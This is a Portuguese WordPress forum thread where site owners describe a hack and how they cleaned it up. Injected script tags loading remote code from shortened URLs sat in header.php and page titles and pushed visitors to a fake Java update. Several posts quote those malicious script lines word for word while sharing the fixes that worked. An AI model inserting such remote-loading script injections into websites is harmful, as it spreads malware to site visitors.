Criador do tópico
natankm
(@natankm)
No header.php uma linha de script assim:
<script src=”http://ow.ly/Hmql30iJwa5?v=NEW-VERSION-2018-03″></script>
Natan, estou com o mesmo problema.. Retirei esse script da minha header porém voltou… Como você arrumou?
Criador do tópico
natankm
(@natankm)
Eu usei o plugin ““Anti-Malware Security and Brute-Force Firewall”, mudei todas as senhas de FTP e Banco de dados, retirei o script do header.php e problema não voltou a acontecer.
O script está reaparecendo no teu header.php?
Reapareceu uma vez, vou tentar fazer esses passos que você fez. Valeu irmão, abraço!
Alguém sabe a solução deste problema?
meu site está com essa problema
http://www.anexogeek.com
Criador do tópico
natankm
(@natankm)
Wesley, dentro do arquivo header.php deve ter um linha de código parecida com essa:
<script src=”http://ow.ly/Hmql30iJwa5?v=NEW-VERSION-2018-03″></script>
É só apagar ela e salvar o arquivo novamente.
Ola natan, então, havia deletado a linha, mas era outro o http://is.gd , mas não resolveu, até que olhando as paginas no menu de paginas do painel do wordpress, havia no nome de uma pagina mesmo um script, com esse link. deletei e resolveu.
Criador do tópico
natankm
(@natankm)
Que bom que resolveu, mas parece que estão melhorando o esquema então…
Até hoje não descobri como o código foi inserido no meu site, mas por via das dúvidas troquei as senhas de FTP, Banco de dados e administradores.
Bom dia amigos. Obrigado pela ajuda… encontrei um script no título de 17 páginas.
<script src=”https://is.gd/ob8vtI?v=v8.0″></script>
Na página HOME onde aparecia o aviso de atualização o tinha esse script.
Removi todos e nao apareceu mais o popup/virus
Olá pessoal, vi que muitos tiveram o problema igual ou similar da atualização de segurança de java, então resolvi compartilhar a experiência que tive com outros amigos no site anexogeek.com, entraram no login do painel de controle do blog por um acesso com senha padrão ( a clássica “mudar123”), e de lá incluíram um comando para redirecionar para uma tal j.mahoney e outro is.gd, que o weslei compartilhou mais acima aqui nesse tópico.
No nosso caso, no painel das páginas mesmo estava o dito cujo que redirecionava para a tal atualização de java falsa.
As ferramentas que ajudaram muito foram o sucuri web check (https://sitecheck.sucuri.net/) que apontou um erro de segurança e o rescan pro (https://rescan.pro/) que também apontou falhas de segurança.
Outro cara que ajudou muito foi o bitdefender free que apontou o script sendo carregado junto da página e já bloqueou ele, sem danificar o acesso a página.
Esqueci de mencionar os 2 plugins de segurança do wordpress que ajudaram muito, o sucuri e o wordfence, além do Anti-Malware Security and Brute-Force Firewall que o natankm mencionou mais acima.